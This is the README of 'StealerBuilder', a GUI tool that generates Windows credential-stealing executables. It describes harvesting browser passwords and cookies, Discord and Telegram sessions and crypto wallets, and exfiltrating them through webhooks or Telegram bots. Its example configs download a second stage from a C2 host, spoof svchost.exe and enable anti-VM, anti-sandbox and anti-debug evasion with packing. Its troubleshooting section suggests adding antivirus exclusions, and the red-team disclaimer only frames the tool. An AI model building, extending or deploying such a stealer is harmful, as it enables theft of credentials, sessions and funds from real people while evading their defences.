A cross-platform Qt6-based GUI application for building Windows executables with advanced payload capabilities. Designed exclusively for authorized red team engagements and penetration testing.
Features β’ Installation β’ Usage β’ Documentation
CRITICAL NOTICE: This software is designed exclusively for legal, authorized security testing purposes. By downloading, compiling, or using this software, you acknowledge and agree to the following terms:
- β Only use on systems you own or have explicit written permission to test
- β Unauthorized use violates computer fraud laws worldwide including:
- Computer Fraud and Abuse Act (CFAA) - United States
- Computer Misuse Act - United Kingdom
- GDPR - European Union
- Equivalent laws in other jurisdictions
- π You are solely responsible for any misuse of this software
- π« The authors assume no liability for illegal use or damages
- βοΈ Violations may result in criminal prosecution and civil penalties
- β Authorized penetration testing engagements
- β Red team operations with proper authorization
- β Security research in controlled environments
- β Educational purposes in academic settings
USE ETHICALLY. USE RESPONSIBLY. USE LEGALLY.
- Features
- Prerequisites
- Installation
- Usage
- Configuration Examples
- Architecture
- Development
- Security Considerations
- Troubleshooting
- Contributing
- Resources
|
|
| Component | Minimum Version | Purpose |
|---|---|---|
| CMake | 3.16+ | Build system |
| Qt | 6.0+ | GUI framework |
| C++ Compiler | C++17 support | Code compilation |
| MinGW-w64 (Linux) | Latest | Cross-compilation to Windows |
| MSVC/MinGW (Windows) | 2019+ | Native Windows compilation |
π§ Ubuntu/Debian
# Update package list
sudo apt-get update
# Install Qt6 and build tools
sudo apt-get install -y \
build-essential \
cmake \
qt6-base-dev \
qt6-base-dev-tools
# Install MinGW for cross-compilation
sudo apt-get install -y mingw-w64
# [Optional] Install UPX for executable packing
sudo apt-get install -y upx-uclπ© Fedora/RHEL/CentOS
# Install Qt6 and build tools
sudo dnf install -y \
gcc-c++ \
cmake \
qt6-qtbase-devel
# Install MinGW for cross-compilation
sudo dnf install -y \
mingw64-gcc \
mingw64-gcc-c++
# [Optional] Install UPX for executable packing
sudo dnf install -y upxποΈ Arch Linux
# Install Qt6 and build tools
sudo pacman -S \
base-devel \
cmake \
qt6-base
# Install MinGW for cross-compilation
sudo pacman -S mingw-w64-gcc
# [Optional] Install UPX for executable packing
sudo pacman -S upxπͺ Windows
Required:
-
CMake (3.16+)
- Download from cmake.org/download
- Add to PATH during installation
-
Qt6
- Download installer from qt.io/download-qt-installer
- Select Qt 6.x for your compiler during installation
-
C++ Compiler (choose one):
- Visual Studio 2019+
- Install "Desktop development with C++" workload
- Download from visualstudio.microsoft.com
- MinGW-w64
- Download from mingw-w64.org
- Add to PATH
- Visual Studio 2019+
Optional: 4. UPX (for packing)
- Download from upx.github.io
- Extract and add to PATH
The automated build scripts handle everything including font downloads:
|
π§ Linux chmod +x build.sh
./build.shThe executable will be at: |
πͺ Windows build.batThe executable will be at: |
π§ Linux (Manual Build)
# Download fonts first
cd fonts && ./download_fonts.sh && cd ..
# Create build directory
mkdir -p build && cd build
# Generate build files
cmake ..
# Compile
make -j$(nproc)
# Run the application
./bin/StealerBuilderπͺ Windows - Visual Studio (Manual Build)
# Download fonts first
cd fonts
.\download_fonts.bat
cd ..
# Create build directory
mkdir build
cd build
# Generate Visual Studio solution
cmake .. -G "Visual Studio 16 2019"
# Build (choose one):
# Option 1: Command line
cmake --build . --config Release
# Option 2: Open Visual Studio
start StealerBuilder.sln
# Run the application
bin\Release\StealerBuilder.exeπͺ Windows - MinGW (Manual Build)
# Download fonts first
cd fonts
download_fonts.bat
cd ..
# Create build directory
mkdir build
cd build
# Generate MinGW Makefiles
cmake .. -G "MinGW Makefiles"
# Build
cmake --build .
# Run the application
bin\StealerBuilder.exe./StealerBuilder # Linux
StealerBuilder.exe # WindowsNavigate through the intuitive tabbed interface to configure your payload:
π₯ Downloader Tab
Configure file download and execution:
- URL: Enter the payload download URL
- Save Path: Specify destination (supports environment variables:
%TEMP%,%APPDATA%,%USERPROFILE%) - Execution Parameters: Add command-line arguments for the downloaded file
π Grabber Tab
Select data sources to extract:
- Browsers: Chrome, Firefox, Edge, Brave (passwords, cookies, history)
- Messaging: Discord tokens, Telegram sessions
- Crypto Wallets: Exodus, Atomic, Electrum
π€ Exfiltration Tab
Choose your data exfiltration method:
- Discord Webhook:
https://discord.com/api/webhooks/{id}/{token} - HTTP POST: Custom endpoint URL
- Telegram Bot: Bot token + Chat ID
πΈ Screenshots Tab
Configure capture options:
- Desktop Screenshot: Capture current screen
- Webcam Capture: Capture from connected camera (if available)
π» System Info Tab
Select system information to collect:
- Hardware ID (HWID)
- Public IP address
- Operating system version
- Installed antivirus software
- Running processes
- System specifications
π₯· Stealth Tab
Configure stealth features:
- Hide Console: Run without visible window (recommended)
- Process Name: Spoof process name for disguise
- Mutex: Ensure single instance execution
- Self-Destruct: Delete after execution (optional)
π‘οΈ Anti-Analysis Tab
Enable detection evasion:
- Anti-VM: Detect virtual machine environments
- Anti-Sandbox: Detect automated analysis systems
- Anti-Debug: Detect debugger attachment
- Sleep Evasion: Bypass time-based sandbox detection
βοΈ Build Options Tab
Configure build settings:
- Output Filename: Name of the generated executable
- Architecture: Select
x86(32-bit) orx64(64-bit) - String Obfuscation: Enable XOR encoding of strings
- UPX Packing: Compress executable (requires UPX installed)
- Custom Icon: Embed custom icon file (optional)
- Compiler Selection: Auto-detect or manually select compiler
Click the "Build Executable" button. The build process:
- β Validates configuration settings
- π§ Generates C++ source code with configured features
- π¨ Compiles using selected compiler (MinGW/MSVC)
- π¦ Optionally packs with UPX compression
- πΎ Outputs final Windows PE executable
- πΎ Save Config: Export settings to JSON file for reuse
- π Load Config: Import previously saved configuration
- π Example Config: See configuration examples below
{
"downloader": {
"url": "https://example.com/payload.exe",
"savePath": "%TEMP%\\update.exe",
"execParams": "/silent"
},
"stealth": {
"hideConsole": true,
"mutex": "MyApp_SingleInstance"
},
"buildOptions": {
"architecture": "x64",
"obfuscate": true
}
}Use Case: Download and execute a payload silently with stealth features.
{
"grabber": {
"chrome": true,
"firefox": true,
"edge": true,
"brave": true,
"discord": true
},
"exfiltration": {
"webhook": "https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN"
},
"systemInfo": {
"hwid": true,
"ip": true,
"os": true,
"av": true
},
"stealth": {
"hideConsole": true
},
"antiAnalysis": {
"vm": true,
"sandbox": true,
"debug": true
},
"buildOptions": {
"architecture": "x64",
"obfuscate": true,
"upx": true
}
}Use Case: Extract browser credentials and system info with full anti-analysis protection.
{
"downloader": {
"url": "https://c2.example.com/stage2.exe",
"savePath": "%APPDATA%\\Microsoft\\update.exe",
"execParams": "--silent --no-gui"
},
"grabber": {
"chrome": true,
"firefox": true,
"discord": true,
"telegram": true,
"wallets": ["exodus", "atomic", "electrum"]
},
"exfiltration": {
"telegram": {
"token": "YOUR_BOT_TOKEN",
"chatId": "YOUR_CHAT_ID"
}
},
"screenshots": {
"desktop": true
},
"systemInfo": {
"hwid": true,
"ip": true,
"os": true,
"av": true,
"processes": true
},
"stealth": {
"hideConsole": true,
"processName": "svchost.exe",
"mutex": "Global\\MyMutex",
"selfDestruct": false
},
"antiAnalysis": {
"vm": true,
"sandbox": true,
"debug": true,
"sleepEvasion": true
},
"buildOptions": {
"architecture": "x64",
"obfuscate": true,
"upx": true,
"icon": "path/to/custom.ico"
}
}Use Case: Full-featured red team payload with anti-analysis and comprehensive data gathering.
The builder automatically detects and uses MinGW-w64 for cross-compilation on Linux:
| Component | Value |
|---|---|
| Compiler | x86_64-w64-mingw32-g++ (x64) / i686-w64-mingw32-g++ (x86) |
| Output Format | Windows PE executable |
| Linking | Static (no DLL dependencies) |
| Runtime | Statically linked libgcc/libstdc++ |
Since payloads are Windows PE files, testing options:
β Recommended: Windows VM (VirtualBox, VMware, QEMU)
- Isolated environment
- Full Windows API support
- Snapshot/rollback capabilities
- Partial Windows API compatibility
- May not work with all features
- Not recommended for production testing
β "No compiler found" Error
Cause: Required compiler not installed or not in PATH
Solution:
- Linux: Install MinGW-w64
sudo apt-get install mingw-w64 # Ubuntu/Debian sudo dnf install mingw64-gcc mingw64-gcc-c++ # Fedora sudo pacman -S mingw-w64-gcc # Arch
- Windows: Install Visual Studio 2019+ or MinGW-w64
- Ensure compiler is added to system PATH
- Restart application after installation
π§ Compilation Errors
Common Issues:
-
Outdated Compiler
- Requires GCC 7+ or MSVC 2019+
- Check version:
g++ --versionorcl /?
-
Missing Windows SDK (Windows only)
- Install Visual Studio with "Desktop development with C++"
- Or install Windows SDK separately
-
UPX Packing Fails
- Try building without UPX first
- Ensure UPX is installed and in PATH
- Check UPX version:
upx --version
Debug Steps:
# Check compiler availability
x86_64-w64-mingw32-g++ --version # Linux
g++ --version # Windows MinGW
cl /? # Windows MSVC
# Try minimal build without extras
# Disable: UPX packing, obfuscation, custom iconπ« Generated Executable Doesn't Run
Expected Behavior:
β οΈ Antivirus/Windows Defender may flag the executable- This varies based on configuration and evasion settings
Solutions:
-
Antivirus Interference
- Add exclusion in Windows Defender if needed
- Test in isolated VM for controlled testing
- Configure evasion techniques for better stealth
-
Architecture Mismatch
- Verify target system architecture
- x86 executables run on x64 Windows
- x64 executables only run on x64 Windows
-
Missing Dependencies
- Ensure static linking is enabled
- Check build logs for linking errors
Testing Environment:
- Use clean Windows 10/11 VM
- Take snapshot before testing
- Monitor with Process Monitor/Procmon
π€ Exfiltration Not Working
Webhook Issues:
-
Invalid Webhook URL
- Verify URL format:
https://discord.com/api/webhooks/{id}/{token} - Test webhook manually:
curl -X POST <webhook_url> -H "Content-Type: application/json" -d '{"content":"test"}'
- Verify URL format:
-
Network Connectivity
- Check target has internet access
- Verify firewall isn't blocking outbound HTTPS
- Try different exfiltration method (HTTP POST vs Discord vs Telegram)
-
Certificate Issues
- Ensure valid SSL certificate on endpoint
- Use HTTPS (not HTTP) for webhooks
Telegram Bot Issues:
- Verify bot token is valid
- Ensure chat ID is correct (use @userinfobot to get ID)
- Bot must have started conversation with user
π₯οΈ Qt Application Issues
Application Won't Start:
- Ensure Qt6 is properly installed
- Check LD_LIBRARY_PATH includes Qt libs (Linux)
- Verify all fonts were downloaded successfully
Font Rendering Issues:
- Run font download script manually:
cd fonts && ./download_fonts.sh && cd ..
- Rebuild application after font download
StealerBuilder (GUI)
βββ MainWindow: Tabbed configuration interface
βββ CompilerManager: Detect and manage compilers
βββ StubGenerator: Generate C++ source from config
βββ Builder: Invoke compiler with proper flags
βββ Config: Load/save JSON configurations
stub.exe (Windows PE)
βββ Anti-Analysis: VM/sandbox/debug detection
βββ Downloader: URLDownloadToFile + ShellExecute
βββ Browser Grabber: SQLite + DPAPI decryption
βββ System Info: WinAPI system information
βββ Screenshots: GDI+ screen capture
βββ Exfiltration: WinHTTP POST to webhook/endpoint
stealer-gui/
βββ π CMakeLists.txt # CMake build configuration
βββ π README.md # This documentation
βββ π ARCHITECTURE.md # Detailed architecture docs
βββ π LICENSE # License file
βββ π example_config.json # Example configuration
β
βββ π¨ build.sh # Linux build script
βββ π¨ build.bat # Windows build script
βββ π resources.qrc # Qt resource file (fonts, icons)
β
βββ π src/ # Source code
β βββ π main.cpp # Application entry point
β β
β βββ π ui/ # User interface
β β βββ mainwindow.h
β β βββ mainwindow.cpp # Main window & tabs
β β
β βββ π config/ # Configuration
β β βββ config.h
β β βββ config.cpp # JSON serialization
β β
β βββ π generator/ # Code generation
β β βββ stubgenerator.h
β β βββ stubgenerator.cpp # C++ stub generation
β β
β βββ π compiler/ # Compiler management
β βββ compilermanager.h
β βββ compilermanager.cpp
β βββ builder.h
β βββ builder.cpp
β
βββ π fonts/ # Embedded fonts
β βββ download_fonts.sh
β βββ download_fonts.bat
β βββ *.ttf # Liberation fonts
β
βββ π build/ # Build output (generated)
βββ bin/
βββ StealerBuilder # Compiled executable
| Component | Technology | Purpose |
|---|---|---|
| GUI Framework | Qt 6 | Cross-platform interface |
| Build System | CMake 3.16+ | Build orchestration |
| Language | C++17 | Application logic |
| Serialization | JSON | Configuration storage |
| Target Output | C++/WinAPI | Generated payloads |
Step-by-Step Guide
1. Update Configuration Schema (src/config/config.h)
struct Config {
// Existing fields...
// Add new feature configuration
bool enableNewFeature;
std::string newFeatureSetting;
};2. Add UI Controls (src/ui/mainwindow.cpp)
// In MainWindow constructor or tab creation
QCheckBox* newFeatureCheckbox = new QCheckBox("Enable New Feature");
QLineEdit* newFeatureInput = new QLineEdit();
// Add to layout
layout->addWidget(newFeatureCheckbox);
layout->addWidget(newFeatureInput);
// Connect signals
connect(newFeatureCheckbox, &QCheckBox::stateChanged,
this, &MainWindow::onNewFeatureChanged);3. Implement Code Generation (src/generator/stubgenerator.cpp)
QString StubGenerator::generate(const Config& config) {
QString sourceCode;
// Add includes if needed
if (config.enableNewFeature) {
sourceCode += "#include <new_header.h>\n";
}
// Add implementation
if (config.enableNewFeature) {
sourceCode += R"(
void newFeatureFunction() {
// Feature implementation
}
)";
}
return sourceCode;
}4. Update JSON Serialization (src/config/config.cpp)
// Save
QJsonObject Config::toJson() const {
QJsonObject json;
json["enableNewFeature"] = enableNewFeature;
json["newFeatureSetting"] = QString::fromStdString(newFeatureSetting);
return json;
}
// Load
void Config::fromJson(const QJsonObject& json) {
enableNewFeature = json["enableNewFeature"].toBool();
newFeatureSetting = json["newFeatureSetting"].toString().toStdString();
}5. Rebuild & Test
cd build
cmake --build .
./bin/StealerBuilder # Test your changesThe project uses CMake with the following key features:
- Qt6 Integration: Automatic MOC, UIC, RCC processing
- Resource Embedding: Fonts and icons embedded via
resources.qrc - Cross-Platform: Supports Linux, Windows (MSVC/MinGW)
- Static Linking: Generated payloads have no external dependencies
|
|
This tool generates executables that may be detected by security solutions:
| Security Solution | Detection Method | Likelihood |
|---|---|---|
| Windows Defender | Signature + Behavioral | π‘ Medium |
| Commercial AV | Signature + Heuristic | π‘ Medium |
| EDR Systems | Behavioral Analysis | π‘ Medium |
| Sandboxes | Dynamic Analysis | π’ Low-Medium |
| Network IDS/IPS | Traffic Patterns | π’ Low |
Note: Detection rates vary based on configuration and target environment. The tool includes evasion techniques but is designed for authorized testing scenarios.
The tool includes various evasion features for red team scenarios:
Included Techniques
-
String Obfuscation
- XOR encoding of sensitive strings
- Runtime decryption
- Effectiveness: Moderate
-
Anti-Debugging
IsDebuggerPresent()checks- Remote debugger detection
- Effectiveness: Moderate
-
Anti-VM Detection
- Registry key checks
- CPUID instruction analysis
- Effectiveness: Good
-
Anti-Sandbox
- Sleep evasion techniques
- Timing checks
- Effectiveness: Moderate
-
Stealth Features
- Hidden console window
- Process name spoofing
- Effectiveness: Good
Note: These techniques are designed for red team engagements and may help bypass basic security controls in controlled testing environments.
We welcome contributions that improve this educational red team tool!
|
|
- Fork the Repository
- Create a Feature Branch
git checkout -b feature/your-feature-name
- Make Your Changes
- Follow existing code style
- Add comments where needed
- Update documentation
- Test Thoroughly
- Build on Linux and Windows (if possible)
- Test generated executables
- Submit Pull Request
- Describe your changes clearly
- Reference any related issues
- Explain testing performed
This project is provided for educational and authorized security testing purposes only.
By using this software, you acknowledge and agree:
- To use it only for legal, authorized purposes
- That you are solely responsible for any misuse
- That the authors assume no liability for damages or illegal use
See LICENSE file for full details.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
THE AUTHORS ARE NOT RESPONSIBLE FOR ANY MISUSE, DAMAGE, OR ILLEGAL ACTIVITY
CAUSED BY THIS PROGRAM.
USE AT YOUR OWN RISK.
| β Authorized Use | β Prohibited Use |
|---|---|
| Penetration testing with written authorization | Unauthorized computer access |
| Red team engagements for clients | Stealing credentials without permission |
| Security research in labs | Deploying on production systems without consent |
| Educational purposes in academic settings | Commercial malware development |
| Testing detection capabilities | Any illegal activity |
- π― MITRE ATT&CK Framework - Adversary tactics and techniques
- π OWASP Testing Guide - Web application security testing
- π Red Team Field Manual - Red team reference guide
- π‘οΈ PTES Technical Guidelines - Penetration testing methodology
- π§ Metasploit Framework - Penetration testing framework
- π Cobalt Strike - Adversary simulation platform
- π Atomic Red Team - Test security controls
- π Sysinternals Suite - Windows analysis tools
- π Offensive Security - OSCP, OSEP certifications
- πΊ IppSec YouTube - HackTheBox walkthroughs
- π» HackTheBox - Penetration testing labs
- π© TryHackMe - Guided cybersecurity training
| Issue Type | Solution |
|---|---|
| π§ Compilation Errors | Check Troubleshooting section |
| π₯οΈ Qt/CMake Issues | Verify installation via Prerequisites |
| π Compiler Detection | Ensure MinGW-w64/MSVC is in PATH |
| π‘ Feature Requests | Open an issue on the repository |
| π Bug Reports | Open an issue with reproduction steps |
| π Security Concerns | Report privately to maintainers |
- Issues: Use GitHub Issues for bug reports and feature requests
- Discussions: For questions and general discussion
- Pull Requests: For code contributions